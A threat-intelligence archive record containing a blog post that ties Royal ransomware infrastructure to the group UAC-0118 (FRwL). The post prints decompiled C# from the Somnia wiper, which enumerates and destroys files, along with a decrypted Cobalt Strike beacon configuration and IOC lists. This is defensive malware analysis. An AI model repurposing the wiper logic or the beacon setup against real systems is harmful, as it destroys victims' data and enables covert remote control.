{
	"id": "883f4f2c-5c55-40f6-a3a5-133df6fdc68c",
	"created_at": "2026-04-06T00:12:51.129679Z",
	"updated_at": "2026-04-10T13:11:33.593949Z",
	"deleted_at": null,
	"sha1_hash": "78d3f455cfc86abc0f5f2ad1346eeca512ab5f39",
	"title": "From Royal with Love",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 615392,
	"plain_text": "From Royal with Love\r\nBy Jason Reaves\r\nPublished: 2023-03-10 · Archived: 2026-04-05 19:54:32 UTC\r\nBy: Jason Reaves and Joshua Platt\r\nSummary\r\nCISA recently released a cybersecurity advisory on the Royal ransomware group. In the advisory, a number of\r\nexcellent mitigation techniques and strategies are recommended. Along with the recommendations are several\r\nIOCs and technical details on related activities.\r\nAfter reviewing several of the IOCs, one of the IPs stood out: 139[.]60.161.213. The date listed in\r\nthe CISA report is November 2022. Interestingly enough, back in November CERT-UA published an advisory on\r\nUAC-0118 aka FRwL. Similar to the report released by CISA, CERT-UA released IOCs, and they also listed\r\n139[.]60.161.213.\r\nA second IOC appears on both lists as well: 94.232.41[.]105. However, this IOC came with a caveat:\r\n“In reference to Cobalt Strike and other tools mentioned above, a tool repository used by Royal was identified at\r\nIP: 94.232.41[.]105 in December 2022.” [1] After a quick search, this IP address hosted two separate Cobalt\r\nStrike instances. The first instance used the domain softloadup[.]com. After a short period of time, the domain was\r\nrotated to sombrat[.]com. While the domains changed, the beacon watermark (license ID) stayed the same:\r\n“206546002”.\r\nThis watermark is not new and has been noted in multiple ransomware-related events. For example, in September\r\nthe watermark showed up in a Play-related ransomware attack. 
While the activity slightly predates the Royal\r\nactivity noted by CISA, the TrendMicro article ties the watermark to previous botnets known to be deployed by\r\nCONTI-related actors, such as Emotet, and to the ransomware strain Quantum.\r\nWiper\r\nWhile investigating Somnia, we discovered a zip package named ‘Release.zip’ on VirusTotal that contained a built\r\nSomnia package (bcb2a2a247daa0e37144e00375094e6c). Somnia is written in .NET and the main code is fairly\r\nsimple. It retrieves a list of all files on the local system along with the files on any shared drives and\r\npasses each file off to the ‘CrashFile’ code:\r\nnamespace Somnia\r\n{\r\n internal class Program\r\n {\r\n public static void Main()\r\n {\r\n Program.GetLocal();\r\n Program.GetNet();\r\n }\r\n public static void GetLocal()\r\n {\r\n CrashFile crasher = new CrashFile();\r\n DriveInfo[] drives = DriveInfo.GetDrives();\r\n for (int i = 0; i \u003c drives.Length; i++)\r\n {\r\n foreach (string fname in Program.GetAllFiles(drives[i].Name))\r\n {\r\n if (!fname.Contains(\"Program Files\") \u0026\u0026\r\n!fname.Contains(\"AppData\") \u0026\u0026 !fname.Contains(\"Windows\"))\r\n {\r\n try\r\n {\r\n crasher.CrashAll(fname);\r\n }\r\n catch\r\n {\r\n }\r\n }\r\n }\r\n }\r\n }\r\n public static void GetNet()\r\n {\r\n CrashFile crasher = new CrashFile();\r\n DriveInfo[] drives = DriveInfo.GetDrives();\r\n for (int i = 0; i \u003c drives.Length; i++)\r\n {\r\n DriveInfo arg_16_0 = drives[i];\r\n foreach (string fname in Program.GetAllFiles(\"\\\\\\\\\"))\r\n {\r\n if (!fname.Contains(\"Windows\") \u0026\u0026 !fname.Contains(\"Boot\") \u0026\u0026\r\n !fname.Contains(\"System Volume Information\") \u0026\u0026\r\n!fname.Contains(\"Windows Defender\") \u0026\u0026\r\n!fname.Contains(\"Windows Defender Advanced Threat Protection\"))\r\n {\r\n try\r\n {\r\n crasher.CrashAll(fname);\r\n }\r\n catch\r\n {\r\n 
}\r\n }\r\n }\r\n }\r\n }\r\nThe code will ignore files with certain keywords in their path:\r\nProgram Files\r\nAppData\r\nWindows\r\nBoot\r\nSystem Volume Information\r\nWindows Defender\r\nWindows Defender Advanced Threat Protection\r\nThe CrashAll functionality performs further checks: the file extension must be in a list of extensions targeted\r\nfor encryption, files that already carry the ‘.somnia’ extension are skipped, and any file with\r\n‘image.bmp’ in the name is skipped.\r\nAfter passing all the previously mentioned checks, the malware encrypts the file by passing the path to\r\nthe ‘CrashOne’ function and then deletes the original file. The CrashOne function is where we see why this\r\nmalware is not ransomware but instead a wiper:\r\n[Image: decompiled CrashOne function]\r\nThe main points of the above code are:\r\n1. Every file encrypted will use AES in CBC mode.\r\n2. Every file encrypted gets a unique AES key and IV.\r\n3. The AES key and IV used are not stored anywhere.\r\n4. The keys could be recovered from memory analysis.\r\nThe malware generates a random 32-byte AES key and a 16-byte IV for every file but does not clean up memory\r\nafterwards.\r\nCobalt Strike\r\nThe Cobalt Strike instances leveraged by this cluster of activity frequently intersect with the\r\nwatermark ‘206546002’. This watermark has many ties to infrastructure associated with various ransomware\r\n
DFIR Report put out two reports related to the resurgence of Emotet to deliver CobaltStrike which\r\nlook to follow the CONTI playbook during their engagement and also leading to ransomware groups suspected to\r\nbe affiliated with ex-CONTI threat actors.\r\nGet Jason Reaves’s stories in your inbox\r\nJoin Medium for free to get updates from this writer.\r\nRemember me for faster sign in\r\nA blog released by SANS around the same time period as the earlier mentioned reports also links these\r\nCobaltStrike deployments to the utilization of tyk.io. The TYK API management protocol can be leveraged to hide\r\nCobaltStrike strike beacon activity, something that was mentioned previously and was also referenced by the late\r\nVitali Kremez as a tactic leveraged by ex-CONTI groups.\r\nAfter decrypting the cobalt strike file referenced in the SANS blog, the CobaltStrike sample unsurprisingly\r\nmatches the same watermark as the instances referenced earlier in the article:\r\n{\r\n 'PROTOCOL': '8',\r\n 'PORT': '443',\r\n 'SLEEPTIME': '45000',\r\n 'MAXGET': '1403644',\r\n 'ITTER': '37',\r\n 'PUBKEY': \"b'30819f300d06092a864886f70d010101050003818d0030818902818100aa7784df47a08a479b4afd8332\r\n 'DOMAINS': 'distinctive-obi-mgw.aws-euw1.cloud-ara.tyk.io,/api/v2/login',\r\n 'SPAWNTO': \"b'5b3240ca30c85bb59f6e384788df3099'\",\r\n 'SPAWNTO_X86': '%windir%\\\\syswow64\\\\dllhost.exe',\r\n 'SPAWNTO_X64': '%windir%\\\\sysnative\\\\dllhost.exe',\r\n 'C2_VERB_GET': 'GET',\r\n 'C2_VERB_POST': 'POST',\r\n 'WATERMARK': '206546002',\r\n 'INJECT_OPTIONS': 'xi1knfb/QiftN2EAhdtcyw==',\r\n 'USERAGENT': 'Mozilla/5.0 (Windows NT 6.3; Trident/7.0; rv:11.0) like Gecko',\r\n 'SUBMITURI': '/api/v2/status',\r\n 'C2_REQUEST': '[(\\'_HEADER\\', 0, \"bytearray(b\\'Accept: text/html,application/xhtml+xml,applicatio\r\n 'C2_POSTREQ': '[(\\'_HEADER\\', 0, \"bytearray(b\\'Accept: text/html,application/xhtml+xml,applicatio\r\n}\r\nWhile ransomware strains have shifted due to various market conditions, 
including detainment and takedowns, the\r\nmotivation behind ransomware has typically been described as financial. However, the underground economy\r\ncontinues to evolve and innovate. As global conditions continue to impact cyberspace, the overlap between\r\nFRwL and Royal operators should not be overlooked.\r\nIOCs\r\n139.60.161[.]213\r\n94.232.41[.]105\r\nsombrat[.com\r\nCS Watermark: 206546002\r\nBeacons:\r\ndistinctive-obi-mgw.aws-euw1.cloud-ara.tyk.io\r\nFile extension:\r\n.somnia\r\nReferences\r\n1: https://www.cisa.gov/news-events/cybersecurity-advisories/aa23-061a\r\n2: https://cert.gov.ua/article/2724253\r\n3: https://www.trendmicro.com/en_us/research/22/i/play-ransomware-s-attack-playbook-unmasks-it-as-another-hive-aff.html\r\n4: https://thedfirreport.com/2022/09/12/dead-or-alive-an-emotet-story/\r\n5: 
https://thedfirreport.com/2022/11/28/emotet-strikes-again-lnk-file-leads-to-domain-wide-ransomware/\r\n6: https://isc.sans.edu/diary/Emotet+infection+with+Cobalt+Strike/28824\r\n7: https://shells.systems/oh-my-api-abusing-tyk-cloud-api-management-service-to-hide-your-malicious-c2-traffic/\r\n8: https://twitter.com/VK_Intel/status/1560725216455626752\r\n9: https://www.justice.gov/opa/pr/us-department-justice-disrupts-hive-ransomware-variant\r\nSource: https://medium.com/walmartglobaltech/from-royal-with-love-88fa05ff7f65",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"Malpedia"
	],
	"origins": [
		"web"
	],
	"references": [
		"https://medium.com/walmartglobaltech/from-royal-with-love-88fa05ff7f65"
	],
	"report_names": [
		"from-royal-with-love-88fa05ff7f65"
	],
	"threat_actors": [
		{
			"id": "610a7295-3139-4f34-8cec-b3da40add480",
			"created_at": "2023-01-06T13:46:38.608142Z",
			"updated_at": "2026-04-10T02:00:03.03764Z",
			"deleted_at": null,
			"main_name": "Cobalt",
			"aliases": [
				"Cobalt Group",
				"Cobalt Gang",
				"GOLD KINGSWOOD",
				"COBALT SPIDER",
				"G0080",
				"Mule Libra"
			],
			"source_name": "MISPGALAXY:Cobalt",
			"tools": [],
			"source_id": "MISPGALAXY",
			"reports": null
		},
		{
			"id": "132e1e0f-8725-42cb-8c2d-d2f3ebb1f005",
			"created_at": "2023-12-08T02:00:05.758552Z",
			"updated_at": "2026-04-10T02:00:03.495698Z",
			"deleted_at": null,
			"main_name": "UAC-0118",
			"aliases": [
				"FRwL",
				"FromRussiaWithLove"
			],
			"source_name": "MISPGALAXY:UAC-0118",
			"tools": [],
			"source_id": "MISPGALAXY",
			"reports": null
		},
		{
			"id": "75108fc1-7f6a-450e-b024-10284f3f62bb",
			"created_at": "2024-11-01T02:00:52.756877Z",
			"updated_at": "2026-04-10T02:00:05.273746Z",
			"deleted_at": null,
			"main_name": "Play",
			"aliases": null,
			"source_name": "MITRE:Play",
			"tools": [
				"Nltest",
				"AdFind",
				"PsExec",
				"Wevtutil",
				"Cobalt Strike",
				"Playcrypt",
				"Mimikatz"
			],
			"source_id": "MITRE",
			"reports": null
		}
	],
	"ts_created_at": 1775434371,
	"ts_updated_at": 1775826693,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/78d3f455cfc86abc0f5f2ad1346eeca512ab5f39.pdf",
		"text": "https://archive.orkl.eu/78d3f455cfc86abc0f5f2ad1346eeca512ab5f39.txt",
		"img": "https://archive.orkl.eu/78d3f455cfc86abc0f5f2ad1346eeca512ab5f39.jpg"
	}
}